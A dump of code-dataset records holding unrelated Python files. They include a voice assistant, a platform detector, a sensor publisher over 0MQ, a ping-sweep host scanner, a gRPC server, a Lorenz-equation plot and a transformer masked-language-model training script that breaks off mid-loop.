\" + date)\n elif 'wikipedia' in command:\n person = command.replace('wikipedia', '')\n info = wikipedia.summary(person, 1)\n print(info)\n speak(info)\n elif 'google' in command:\n thing = command.replace('google', '')\n webbrowser.open(f'https://www.google.com/search?q={thing}')\n speak('Here are the results of your google search ')\n elif 'weather in' in command:\n city = command.split(\"in\", 1)\n weather_data = weather_api(city[1])\n speak(weather_data)\n elif 'send email' in command:\n mail_info()\n elif 'goodbye' in command:\n speak(\"bye bye\")\n quit()\n elif 'create a note' in command:\n note()\n\n else:\n speak(\"Say that again.\")\n\n\nwhile True:\n run_chad()\n\n\n","repo_name":"Sarinafo/Desktop-Assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8918827156","text":"import platform\nimport struct\nimport sys\n\nfrom ctypes import cdll, c_char_p, CFUNCTYPE\nfrom fnmatch import fnmatch\n\nplat_table = (\n ('windows', ('windows', 'cygwin-*')),\n ('darwin', ('darwin',)),\n ('ios', ('ios',)),\n ('linux', ('linux*',)),\n ('freebsd', ('freebsd*', 'openbsd*', 'isilon onefs')),\n ('poky', ('poky',)),\n)\n\narch_table = (\n ('x86', ('i?86', )),\n ('x86_64', ('x64', 'x86_64', 'amd64', 'intel')),\n ('arm', ('armv5',)),\n ('armv6', ('armv6l',)),\n ('armv7', ('armv7l',)),\n ('ppc64', ('ppc64le',)),\n ('mips32', ('mips',)),\n ('aarch32', ('aarch32',)),\n ('aarch64', ('aarch64', 'arm64'))\n)\n\n\ndef _match_features(patterns, s):\n for pat in patterns:\n if fnmatch(s, pat):\n return True\n\n\ndef _gnu_get_libc_version():\n try:\n prototype = CFUNCTYPE(c_char_p)\n ver = prototype(('gnu_get_libc_version', cdll.LoadLibrary('')))()\n return ver.decode().split('.')\n except Exception:\n pass\n\n\ndef format_platform():\n plat = platform.system().lower()\n mach = platform.machine().lower()\n\n for alias, platlist in plat_table:\n if _match_features(platlist, plat):\n plat = alias\n break\n\n if plat == 'linux':\n cname, cver = platform.libc_ver()\n if cname == 'musl':\n plat = 'musl'\n elif cname == 'libc':\n plat = 'android'\n elif cname == 'glibc':\n v = _gnu_get_libc_version()\n if v and len(v) >= 2 and (int(v[0]) * 100 + int(v[1])) < 214:\n plat = 'centos6'\n\n for alias, archlist in arch_table:\n if _match_features(archlist, mach):\n mach = alias\n break\n\n if plat == 'windows' and mach == 'x86_64':\n bitness = struct.calcsize('P'.encode()) * 8\n if bitness == 32:\n mach = 'x86'\n\n return '.'.join([plat, mach])\n\n\nif __name__ == '__main__':\n print('platform.system is \"%s\"' % platform.system())\n print('platform.machine is \"%s\"' % platform.machine())\n print('sys.byteorder is \"%s\"' % sys.byteorder)\n print('The standard platform name is \"%s\"' % format_platform())\n","repo_name":"dashingsoft/pyarmor","sub_path":"src/helper/get_platform_name.py","file_name":"get_platform_name.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":2600,"dataset":"github-code","pt":"18"} +{"seq_id":"33971356768","text":"\"\"\"\nPublishes temperature, pressure, humidity, luminosity and heat index from your Pi over 0MQ.\n\"\"\"\nimport logging\n\nimport argparse\nimport sys\nfrom json import dumps\nfrom time import sleep\n\nfrom socket import gethostname\n\nfrom AnaviInfraredPhat import report_tphl_average\nfrom pap_logger import PaPLogger, DEBUG, INFO\nimport zmq\n\n\ndef _run(param):\n \"\"\"\n Publishes temperature, pressure, humidity, luminosity and heat index from your Pi over 0MQ every interval seconds.\n \"\"\"\n logging.info('Starting')\n context = zmq.Context()\n socket = context.socket(zmq.PUB)\n socket.setsockopt(zmq.CONFLATE, 1)\n socket.bind(\"tcp://%s:%s\" % (\"*\", param.pub_port))\n hostname = gethostname()\n while True:\n data = dumps(report_tphl_average(\"localhost\"))\n logging.debug(data)\n socket.send_string(\"{} {}\".format(hostname, data))\n sleep(param.interval)\n\n\ndef _main():\n param = _get_args()\n level = DEBUG if param.verbose else INFO\n pap = PaPLogger(level=level, verbose_fmt=True)\n pap.log_file = \"/var/logAnaviInfraredPhat.log\"\n _run(param)\n\n\ndef _get_args():\n parser = argparse.ArgumentParser(\n description='Publishes temperature, pressure, humidity, luminosity and heat index from your Pi over 0MQ.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--pub_port\", help=\"port for zmq publication\", default=4242, type=int)\n parser.add_argument(\"--interval\", help=\"publication interval in seconds\", default=30, type=int)\n parser.add_argument(\"--verbose\", help=\"activate debugging\", action=\"store_true\")\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n try:\n _main()\n except KeyboardInterrupt:\n logging.info(\"Exiting\")\n sys.exit(0)\n except Exception:\n logging.exception(\"exception raised\")\n sys.exit(-1)\n","repo_name":"1743294154/python-xiao","sub_path":"venv/Lib/site-packages/AnaviInfraredPhat/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"28431699718","text":"import os.path\nimport re\nimport subprocess\nimport traceback\nfrom time import sleep\nfrom utils.output import Output\nfrom utils.db import DB\n\nttl_pattern = re.compile(\"^\\\\d+.+: icmp_seq=\\\\d+ ttl=(\\\\d+) \\\\S+=\\\\S+\\\\s+ms.*$\")\nrtt_pattern = re.compile(\"^rtt\\\\s+min/avg/max/mdev\\\\s+=\\\\s+(\\\\d+\\\\.\\\\d+)/(\\\\d+\\\\.\\\\d+)/(\\\\d+\\\\.\\\\d+)/(\\\\d+\\\\.\\\\d+)\\\\s+ms.*$\")\n\ndef pingscan_worker(target, timeout):\n try:\n pingscan = PingScan(target['hostname'], timeout)\n\n is_up, rtt, os = pingscan.check_up()\n\n if is_up:\n Output.write({'target': '%s' % target['hostname'], 'message': \"Up => %.4f ms (%s)\" % (rtt, os)})\n\n DB.insert_ip({\n 'hostname': target['hostname'],\n 'rtt': rtt,\n })\n except Exception as e:\n raise e\n\nclass PingScan:\n\n def __init__(self, hostname, timeout):\n self.hostname = hostname\n self.timeout = timeout\n\n def check_up(self):\n\n process = subprocess.Popen(\"ping -c 3 -i 0.2 %s -w %d\" % (self.hostname, self.timeout), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n process_output, _ = process.communicate()\n process.wait()\n process_returncode = process.returncode\n\n if process_returncode == 2:\n process = subprocess.Popen(\"ping -c 3 -i 0,2 %s -w %d\" % (self.hostname, self.timeout), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n process_output, _ = process.communicate()\n process.wait()\n process_returncode = process.returncode\n\n if process_returncode == 0:\n rtt = None\n os = 'Unknown'\n\n for line in process_output.decode().split('\\n'):\n m = ttl_pattern.match(line)\n if m:\n if int(m.group(1)) == 64:\n os = 'Linux?'\n elif int(m.group(1)) == 128:\n os = 'Windows?'\n elif int(m.group(1)) == 255:\n os = 'AIX/FreeBSD?'\n else:\n os = 'Unknown (ttl=%s)' % m.group(1)\n\n m = rtt_pattern.match(line)\n if m:\n rtt = float(m.group(2))\n break\n\n return True, rtt, os\n elif process_returncode == 1:\n pass\n else:\n Output.error({'target': '%s' % self.hostname, 'message': \"Error: ping return code: %d\" % (process_returncode,)})\n\n return False, None, None\n","repo_name":"hegusung/netscan","sub_path":"scripts/lib/pingscan/pingscan.py","file_name":"pingscan.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"} +{"seq_id":"33829195481","text":"import numpy as np\r\nimport pickle\r\nimport pandas as pd\r\nimport cv2\r\nfrom reading_feats import *\r\nfrom set_weights_for_model import *\r\nfrom preprocesing_feats import *\r\nfrom preprocessing_pics import *\r\nfrom model_7_feats import *\r\n\r\nbase_path = 'D:/Users/Keren/Documents/university/Year 2/DNA Fragmentation/Acridine Orange/feature_extractions/'\r\n\r\nall_dfs,donors = read_feats_file(base_path+'final_exp_3.xlsx')\r\n\r\ncombined_model = set_weights('New_AO_combined_7feats_2best_prec.pickle',combined_model)\r\n\r\nimage_location_base_dir = 'E:/Keren Sperm Project Backup/final_exp'\r\n\r\nall_ao_outputs = {}\r\n\r\nfor i in range(len(all_dfs)):\r\n all_images = []\r\n all_feats = []\r\n cur_indexes = list(all_dfs[i].iloc[:,0])\r\n for j in range(len(cur_indexes)):\r\n cur_index = cur_indexes[j]\r\n v_ind = cur_index.index('v')\r\n f_ind = cur_index.index('f')\r\n C_ind = cur_index.index('C')\r\n\r\n don_num = (cur_index[1:v_ind])\r\n vid_num = (cur_index[v_ind + 1:f_ind])\r\n frm_num = (cur_index[f_ind + 1:C_ind])\r\n cel_num = (cur_index[C_ind + 2:])\r\n\r\n cur_location = image_location_base_dir + '/donor ' + don_num + '/video_' + vid_num + '/C_' + cel_num + '/' + frm_num + '.png'\r\n all_images.append(resize(cv2.imread(cur_location)))\r\n all_feats.append(np.array(all_dfs[i].iloc[j, 1:]))\r\n\r\n all_images = np.array(all_images)\r\n all_images = all_images[:,:,:,0]\r\n all_images = all_images[:,:,:,np.newaxis]\r\n all_feats = np.array(all_feats)\r\n all_feats = normalizing_features(all_feats)\r\n cur_AO_output = combined_model.predict([all_images, all_feats],batch_size=32,verbose=1)\r\n\r\n cur_df = all_dfs[i]\r\n cur_df['AO'] = cur_AO_output\r\n all_ao_outputs[donors[i]]=np.nanmean(cur_AO_output)\r\n\r\n\r\n# with pd.ExcelWriter(base_path+'final_exp_wao.xlsx') as writer:\r\n# columns = ['Total Head Area','Nucleus Area','Acrosome Area','Mean Post Ant Diff','Mean OPD','Var OPD','Drymass','AO']\r\n# for i in range(len(all_dfs)):\r\n# df = all_dfs[i]\r\n# sheet_name = 'donor '+str(donors[i])\r\n# df.to_excel(writer, sheet_name=sheet_name)\r\n","repo_name":"kbenyehuda/AO-Fragmentation-Base-Model","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36433252672","text":"import asyncio\nimport grpc\nfrom service_pb2 import Response\nfrom service_pb2_grpc import YourServiceServicer, add_YourServiceServicer_to_server\n\n\nclass YourServicer(YourServiceServicer):\n async def UnaryCall(self, request, context):\n return Response(message=f\"Hello, {request.message}\")\n\n async def StreamCall(self, request, context):\n for i in range(10): # Отправляем 10 сообщений\n await asyncio.sleep(1)\n yield Response(message=f\"Stream {i}\")\n\n\nasync def serve():\n server = grpc.aio.server()\n add_YourServiceServicer_to_server(YourServicer(), server)\n server.add_insecure_port('[::]:50051')\n await server.start()\n await server.wait_for_termination()\n\nif __name__ == '__main__':\n asyncio.run(serve())\n","repo_name":"AlexKenbo/grpc_python_tests","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33782212111","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# Variables:\nb = 8/3\nsig = 10\nplt.style.use('bmh')\n\n#Determine Polynomial coefficients\ndef polyarray(b,sig,r):\n p3 = 1\n p2 = 1 + b + sig\n p1 = b*(sig + r)\n p0 = 2*sig*b*(r - 1)\n return np.array([p3,p2,p1,p0])\n\nplt.axvspan(-15,0, alpha=0.2, color='green', label='stable')\nplt.axvspan(0,5, alpha=0.2, color='red',label='unstable')\nfor r in [1.3456,1.5,20,24.74,28]:\n poly = polyarray(b,sig,r)\n roots = np.roots(poly)\n \n print('\\nSolutions for r = '+str(r)+'\\n')\n print('x1 = '+str(np.round(roots[0],2)))\n print('x2 = '+str(np.round(roots[1],2)))\n print('x3 = '+str(np.round(roots[2],2)))\n\n plt.scatter(roots.real, roots.imag, label='r = {}'.format(r))\nplt.xlim(-15,2)\nplt.legend()\nplt.show()\n \n \n","repo_name":"MauriceDonner/CompPhys","sub_path":"8_Exerc/ex1-2.py","file_name":"ex1-2.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1445606273","text":"from Trieste.common.utils import next\nfrom Trieste.common.object import Object\n\nclass Ring (Object):\n \"\"\"\n This class handles all the calls to navels that can return a redirection\n and handle that redirection\n \"\"\"\n def __init__ (self, master):\n Object.__init__ (self)\n self.master= master\n self.peers= master._peers\n\n def getData (self, key):\n navel= self.peers.getAuthNavel (key)\n ans= navel.getData (key)\n ok= ans[0]\n while not ok:\n (url, key)= ans[1]\n self.debug (1, \"redirect to: %s:%d\" % (url, key))\n navel= self.peers.getNavel (url, key)\n ans= navel.getData (key)\n ok= ans[0]\n\n # when succeed, returns a str of the list\n return ans\n\n def addData (self, data, max, peer=None):\n # may be this should be more clever,\n # just like what vice does\n if peer==None:\n keys=data.keys ()\n keys.sort ()\n peer= self.peers.getAuthNavel (keys[0])\n\n ans= peer.addData (data)\n # iterate as the keys get rejected 'cause there's another auth\n ok= ans[0]\n while not ok:\n (url, key)= ans[1]\n self.debug (1, \"redirect to: %s:%d\" % (url, key))\n peer= self.peers.getNavel (url, key)\n ans= peer.addData (self.master.giveData (peer.key (), max))\n ok= ans[0]\n\n def delKey (self, key):\n \"\"\"\n removes one key from the ring. used when deleting inodes.\n \"\"\"\n peer= self.peers.getAuthNavel (key)\n ans= peer.delKey (key)\n\n # methods to come:\n # takeData from Navel.keyPass()\n # forgetData from Navel.tellPredToForget()\n\n def vicesForIno (self, ino):\n urls= self.getData (ino)\n ok= next (urls)\n if ok:\n vices= []\n for url in urls:\n vices.append (self.peers.getVice (url))\n self.debug (1, 'ino %d vices: %s' % (ino, vices))\n return vices\n else:\n return None\n","repo_name":"StyXman/Trieste","sub_path":"Trieste/common/ring.py","file_name":"ring.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"8037516002","text":"from tkinter.filedialog import askdirectory\n\nimport os\nimport re\n\n\ndef sanitizeFiles():\n directory = askdirectory()\n\n if directory.split('/')[-1] == 'ST':\n for filename in os.listdir(directory):\n filepath = directory + '/' + filename\n if not os.path.isfile(filepath):\n continue\n\n f = open(filepath, \"r+\", encoding=\"utf8\")\n fullText = f.read()\n fullText = fullText.replace('Active in Program', '\\nActive in Program').replace('Admit Term', '\\nAdmit Term')\n\n f.seek(0) # go to the beginning of the file before writing\n f.write(fullText)\n f.truncate()\n f.close()\n\n elif directory.split('/')[-1] == 'SIN':\n for filename in os.listdir(directory):\n filepath = directory + '/' + filename\n if not os.path.isfile(filepath):\n continue\n\n f = open(filepath, \"r+\", encoding=\"utf8\")\n fullText = f.read()\n\n try:\n firstName = re.findall('First Name:[a-zA-Z]*\\n*', fullText)[0].rstrip('\\n')\n middleName = re.findall('Middel Name\\(s\\):[a-zA-Z]*\\n*', fullText)[0].rstrip('\\n')\n except IndexError as error:\n print(f'Could not parse file {filename} correctly: {error}')\n continue\n\n # the order of string replacement is important\n fullText = fullText.replace('Family Name(s):', '')\n fullText = re.sub('Middel Name\\(s\\):[a-zA-Z]*\\n*', middleName + ' ', fullText).replace('Middel Name(s):', ' ')\n fullText = re.sub('First Name:[a-zA-Z]*\\n*', firstName + ' ', fullText)\n\n f.seek(0) # go to the beginning of the file before writing\n f.write(fullText)\n f.truncate()\n f.close()\n\n\nif __name__ == '__main__':\n sanitizeFiles()\n","repo_name":"AC159/doccano-client","sub_path":"Machine-Learning-Integration/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"9506557279","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport math\nimport time\nimport numpy as np\nfrom transformers.utils import logging\nfrom transformers import glue_convert_examples_to_features, DataCollatorForLanguageModeling\nfrom transformers import BertTokenizer, BertModel\nfrom transformers.models.bert.modeling_bert import BertEmbeddings\nfrom torch.autograd import variable\nfrom torch.utils.data import DataLoader\nfrom data import load_wiki\nimport wandb\nlogging.set_verbosity_error()\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nfrom hourglass.hourglass_transformer_pytorch.hourglass_transformer_pytorch import HourglassTransformerLM\n\n\nclass CosineWarmupScheduler(optim.lr_scheduler._LRScheduler):\n\n def __init__(self, optimizer, warmup, max_iters):\n self.warmup = warmup\n self.max_num_iters = max_iters\n super().__init__(optimizer)\n\n def get_lr(self):\n lr_factor = self.get_lr_factor(epoch=self.last_epoch)\n return [base_lr * lr_factor for base_lr in self.base_lrs]\n\n def get_lr_factor(self, epoch):\n lr_factor = 0.5 * (1 + np.cos(np.pi * epoch / self.max_num_iters))\n if epoch <= self.warmup:\n lr_factor *= epoch * 1.0 / self.warmup\n return lr_factor\n \n\ndef scaled_dot_product(q, k, v, mask=None):\n d_k = q.size()[-1]\n attn_logits = torch.matmul(q, k.transpose(-2, -1))\n attn_logits = attn_logits / math.sqrt(d_k)\n if mask is not None:\n attn_logits = attn_logits.masked_fill(mask == 0, -9e15) \n attention = F.softmax(attn_logits, dim=-1)\n values = torch.matmul(attention, v)\n return values, attention\n\nclass MultiheadAttention(nn.Module):\n\n def __init__(self, input_dim, embed_dim, num_heads):\n super().__init__()\n assert embed_dim % num_heads == 0, \"Embedding dimension must be 0 modulo number of heads.\"\n\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n self.head_dim = embed_dim // num_heads\n\n # Stack all weight matrices 1...h together for efficiency\n # Note that in many implementations you see \"bias=False\" which is optional\n self.qkv_proj = nn.Linear(input_dim, 3*embed_dim)\n self.o_proj = nn.Linear(embed_dim, embed_dim)\n\n self._reset_parameters()\n\n def _reset_parameters(self):\n # Original Transformer initialization, see PyTorch documentation\n nn.init.xavier_uniform_(self.qkv_proj.weight)\n self.qkv_proj.bias.data.fill_(0)\n nn.init.xavier_uniform_(self.o_proj.weight)\n self.o_proj.bias.data.fill_(0)\n\n def forward(self, x, mask=None, return_attention=False):\n batch_size, seq_length, _ = x.size()\n qkv = self.qkv_proj(x)\n\n # Separate Q, K, V from linear output\n qkv = qkv.reshape(batch_size, seq_length, self.num_heads, 3*self.head_dim)\n qkv = qkv.permute(0, 2, 1, 3) # [Batch, Head, SeqLen, Dims]\n q, k, v = qkv.chunk(3, dim=-1)\n\n # Determine value outputs\n values, attention = scaled_dot_product(q, k, v, mask=mask)\n values = values.permute(0, 2, 1, 3) # [Batch, SeqLen, Head, Dims]\n values = values.reshape(batch_size, seq_length, self.embed_dim)\n o = self.o_proj(values)\n\n if return_attention:\n return o, attention\n else:\n return o\n\nclass EncoderBlock(nn.Module):\n\n def __init__(self, input_dim, num_heads, dim_feedforward = None, dropout=0.0):\n \"\"\"\n Inputs:\n input_dim - Dimensionality of the input\n num_heads - Number of heads to use in the attention block\n dim_feedforward - Dimensionality of the hidden layer in the MLP\n dropout - Dropout probability to use in the dropout layers\n \"\"\"\n super().__init__()\n if dim_feedforward == None:\n dim_feedforward = input_dim*4\n # Attention layer\n self.self_attn = MultiheadAttention(input_dim, input_dim, num_heads)\n\n # Two-layer MLP\n self.linear_net = nn.Sequential(\n nn.Linear(input_dim, dim_feedforward),\n nn.Dropout(dropout),\n nn.GELU(),\n nn.Linear(dim_feedforward, input_dim)\n )\n\n # Layers to apply in between the main layers\n self.norm1 = nn.LayerNorm(input_dim)\n self.norm2 = nn.LayerNorm(input_dim)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, mask=None):\n # Attention part\n attn_out,att = self.self_attn(x, mask=mask, return_attention = True)\n x = x + self.dropout(attn_out)\n x = self.norm1(x)\n\n # MLP part\n linear_out = self.linear_net(x)\n x = x + self.dropout(linear_out)\n x = self.norm2(x)\n\n return x, att\n\nclass TransformerEncoder(nn.Module):\n\n def __init__(self, num_layers, d_model, n_head, reduce = False):\n super().__init__()\n self.reduce = reduce\n self.layers = nn.ModuleList([nn.TransformerEncoderLayer(d_model=d_model, nhead=n_head) for _ in range(num_layers)])\n\n def forward(self, x, mask=None):\n # trackarray = torch.zeroes(x.shape[0,1])\n trackarray = torch.cat( [torch.LongTensor(list(range(x.shape[1])) ).unsqueeze(0) for i in range(x.shape[0])])\n # mask = torch.matmul(mask.unsqueeze(-1).transpose(1,2).float(),mask.unsqueeze(-1).float()).long().unsqueeze(1)\n mask = mask.transpose(0,1)#.bool()\n # print(mask)\n # print(mask.type())\n # print(trackarray)\n for a,l in enumerate(self.layers):\n # print(\"shape of x at layer \",x.shape)\n x,att = l(x, src_key_padding_mask=mask)\n # print(\"shape of x at layer after compute\",x.shape)\n\n if self.reduce and a % 3 == 0:\n x, mask, trackarray = self.extract(x,att, mask = mask, trackarray = trackarray)\n # print(\"shape of x at layer after extract\",x.shape)\n return x, trackarray\n\n def extract(self, x, attention, mask = None, trackarray = None, attention_based = True, similarity_based = True, reduction_fac = 2): \n # x is assumed to be (batch, seqlen, d_model)\n #attentions is assumed to be (batch,num_heads, seqlen, seqlen )\n\n if attention_based:\n attentions = torch.sum(attention, dim = (1,2))\n sorted_att, indices = torch.topk(attentions,int(attentions.shape[1]/reduction_fac), dim = -1, sorted = False) #dont know which to reduce(row or col)\n x = torch.cat( [x[i,indices[i]].unsqueeze(0) for i in range(x.shape[0])] ) \n mask = torch.cat( [mask[i,indices[i]].unsqueeze(0) for i in range(x.shape[0])] )\n trackarray = torch.cat( [trackarray[i,indices[i]].unsqueeze(0) for i in range(x.shape[0])] )\n \n if similarity_based:\n x = x\n return x, mask, trackarray\n\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, max_len=5000):\n \"\"\"\n Inputs\n d_model - Hidden dimensionality of the input.\n max_len - Maximum length of a sequence to expect.\n \"\"\"\n super().__init__()\n\n # Create matrix of [SeqLen, HiddenDim] representing the positional encoding for max_len inputs\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0)\n\n # register_buffer => Tensor which is not a parameter, but should be part of the modules state.\n # Used for tensors that need to be on the same device as the module.\n # persistent=False tells PyTorch to not add the buffer to the state dict (e.g. when we save the model)\n self.register_buffer('pe', pe, persistent=False)\n\n def forward(self, x):\n x = x + self.pe[:, :x.size(1)]\n return x\n\n \n\nclass TransformerPredictor(nn.Module):\n\n def __init__(self, input_dim, model_dim, num_classes, num_heads, num_layers,reduce = False, lr=1e-4,batch_size=8, dropout=0.1, weight_decay = 1e-2, mode = \"mlm\"):\n \"\"\"\n Inputs:\n input_dim - Hidden dimensionality of the input\n model_dim - Hidden dimensionality to use inside the Transformer\n num_classes - Number of classes to predict per sequence element\n num_heads - Number of heads to use in the Multi-Head Attention blocks\n num_layers - Number of encoder blocks to use.\n lr - Learning rate in the optimizer\n dropout - Dropout to apply inside the model\n \"\"\"\n super().__init__()\n self.dropout = dropout\n self.input_dim = input_dim\n self.model_dim = model_dim\n self.num_classes = num_classes\n self.num_layers = num_layers\n self.num_heads = num_heads\n self.lr = lr\n self.mode = mode\n self.loss = nn.CrossEntropyLoss()\n self.reduce = reduce\n self.batch_size = batch_size\n self.padding = True\n self.weight_decay = weight_decay\n self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n from transformers import BertConfig\n self.config = BertConfig()\n \n self.create_new_head(num_classes)\n # self._create_model()\n \n # self.model = BertModel(self.config)#.from_pretrained('bert-base-uncased')\n self.model = HourglassTransformerLM(num_tokens = self.config.vocab_size,dim = 768,causal = False,attn_resampling = True,\n max_seq_len = 1024,shorten_factor = 2,depth = (3, (3, (3, 3, 3), 3), 3), heads = 12)\n\n\n self.optimizer = optim.Adam(self.parameters(), lr=self.lr, weight_decay = self.weight_decay)\n\n def _create_model(self):\n # Input dim -> Model \n self.embeddings = BertEmbeddings(self.config)\n # self.word_embeddings = nn.Embedding(self.input_dim, self.model_dim, padding_idx=self.config.pad_token_id)\n # self.position_embeddings = nn.Embedding(self.config.max_position_embeddings, self.model_dim)\n # self.token_type_embeddings = nn.Embedding(1, self.model_dim)\n # self.register_buffer(\"position_ids\", torch.arange(self.config.max_position_embeddings).expand((1, -1)))\n # self.emblayernorm = nn.LayerNorm(self.model_dim)\n # self.embdropout = nn.Dropout(self.dropout)\n\n # self.input_net = nn.Sequential(\n # # nn.Dropout(self.input_dropout),\n # nn.Linear(self.input_dim, self.model_dim),\n # # nn.ReLU(inplace=True),\n # # nn.Linear(self.model_dim, self.model_dim),\n # )\n # self.seg_embedding = nn.Sequential(nn.Linear(1, self.model_dim)\n # )\n # # Positional encoding for sequences\n # self.positional_encoding = PositionalEncoding(d_model=self.model_dim)\n # # Transformer\n encoder_layer = nn.TransformerEncoderLayer(d_model=self.model_dim, nhead=self.num_heads)\n self.transformer = nn.TransformerEncoder(encoder_layer, num_layers=self.num_layers)\n # self.transformer = TransformerEncoder(num_layers=self.num_layers,\n # d_model=self.model_dim,\n # n_head=self.num_heads,\n # reduce = self.reduce)\n\n # Output classifier per sequence lement\n self.output_net = nn.Sequential(\n nn.Linear(self.model_dim, self.model_dim),\n nn.LayerNorm(self.model_dim),\n nn.ReLU(inplace=True),\n nn.Dropout(self.dropout),\n nn.Linear(self.model_dim, self.num_classes),\n # nn.Softmax(dim = -1)\n )\n\n def create_new_head(self, num_classes):\n self.output_net = nn.Sequential(\n nn.Linear(self.model_dim, self.model_dim),\n nn.LayerNorm(self.model_dim),\n nn.ReLU(inplace=True),\n nn.Dropout(self.dropout),\n nn.Linear(self.model_dim, num_classes)\n )\n self.output_net.to(device)\n self.optimizer = optim.Adam(self.parameters(), lr=self.lr)\n \n\n def oldforward(self, x, token_type_ids = None, mask=None, add_positional_encoding=True):\n \"\"\"\n Inputs:\n x - Input features of shape [Batch, SeqLen, input_dim]\n mask - Mask to apply on the attention outputs (optional)\n add_positional_encoding - If True, we add the positional encoding to the input.\n Might not be desired for some tasks.\n \"\"\"\n\n # inputs_embeds = self.word_embeddings(x)\n # token_type_embeddings = self.token_type_embeddings(token_type_ids)\n\n # embeddings = inputs_embeds + token_type_embeddings\n # if add_positional_encoding:\n # position_ids = self.position_ids[:, : x.size()[1] ]\n # position_embeddings = self.position_embeddings(position_ids)\n # embeddings += position_embeddings\n # embeddings = self.emblayernorm(embeddings)\n # embedding_output = self.embdropout(embeddings)\n\n # print(x)\n # print(x.shape)\n embedding_output = self.embeddings(\n input_ids=x,\n token_type_ids=token_type_ids,\n )\n\n # x = F.one_hot(x, self.input_dim)\n # x = self.input_net(x.float())\n # if add_positional_encoding:\n # x = self.positional_encoding(x)\n # if not token_type_ids == None:\n # x = x + self.seg_embedding(token_type_ids.unsqueeze(-1).type(torch.float))\n # x = self.emblayernorm(x)\n # embedding_output = self.embdropout(x)\n # print(embedding_output)\n # print(embedding_output.shape)\n x = self.transformer(embedding_output, src_key_padding_mask=mask.transpose(0,1))\n # print(x.shape)\n if self.mode == \"cls\":\n x = x[:,0]\n # print(x.shape)\n #x,_ = torch.max(x, dim = 1)\n x = self.output_net(x)\n #x = F.softmax(x, dim = 1)\n return x, trackarray\n\n def forward(self, x, mask=None, token_type_ids = None):\n x = self.model(x, mask = mask, token_type_ids = token_type_ids) \n \n # x = x.last_hidden_state[:,0]\n if self.mode == \"cls\":\n x = x[:,0]\n x = self.output_net(x)\n\n return x\n\n\n def mask(self, input_ids, mask_token_id = 103):\n # create random array of floats in equal dimension to input_ids\n rand = torch.rand(input_ids.shape).to(device)\n # where the random array is less than 0.15, we set true\n mask_arr = (rand < 0.15) * (input_ids != 101) * (input_ids != 102)* (input_ids != 0)\n mask_arr1 = (rand < 0.15*0.8)* (input_ids != 101) * (input_ids != 102)* (input_ids != 0) #* (mask_arr)\n mask_arr2 = (0.15*0.8 < rand)* (rand < 0.15*0.9)* (input_ids != 101) * (input_ids != 102)* (input_ids != 0)\n # mask_arr3 = (0.15*0.9 < rand < 0.15)* (input_ids != 101) * (input_ids != 102)* (input_ids != 0) not needed since just nothing is done\n\n input_ids = torch.where(mask_arr1, mask_token_id, input_ids)#80% normal masking\n input_ids = torch.where(mask_arr2, (torch.rand(1, device = device)* self.tokenizer.vocab_size).long(), input_ids)#10% random token\n #last 10% is just original token and does not need to be replaced\n return input_ids, mask_arr\n \n def compute_mlm_loss(self,output,labels):\n output = output.flatten(start_dim = 0, end_dim = 1)\n labels = labels.flatten(start_dim = 0, end_dim = 1)\n loss = self.loss(output, labels)\n return loss\n\n #todo test mlm results\n\n def fitmlm(self,dataset, steps, checkpoint_pth = None):\n self.scheduler =CosineWarmupScheduler(optimizer= self.optimizer, \n warmup = 3000 ,\n max_iters = steps)\n wandb.init(project=\"mlmwith-hourglass\")\n wandb.watch(self)\n self.mode = \"mlm\"\n runinngloss = 0.0\n stepsperloss = 0\n for i,data in enumerate(dataset):\n start = time.time()\n \n input = self.tokenizer(data, return_tensors=\"pt\", padding=True, max_length = 256, truncation = True)\n input = input.to(device)\n labels = torch.clone(input[\"input_ids\"])\n input[\"input_ids\"], mask = self.mask(input[\"input_ids\"])\n labels = torch.where(mask, labels, -100)\n\n self.zero_grad()\n\n output = self(input[\"input_ids\"], mask = input[\"attention_mask\"].bool())\n loss = self.compute_mlm_loss(output,labels)\n loss.backward()\n stepsperloss += 1\n runinngloss += loss.item()\n self.optimizer.step()\n self.scheduler.step()\n\n\n # sentence = torch.argmax(output[0], dim = -1)\n # strsent = self.tokenizer.decode(sentence)\n # print(\"og sentence\",data[0])\n # print(\"pred sentence\",strsent)\n 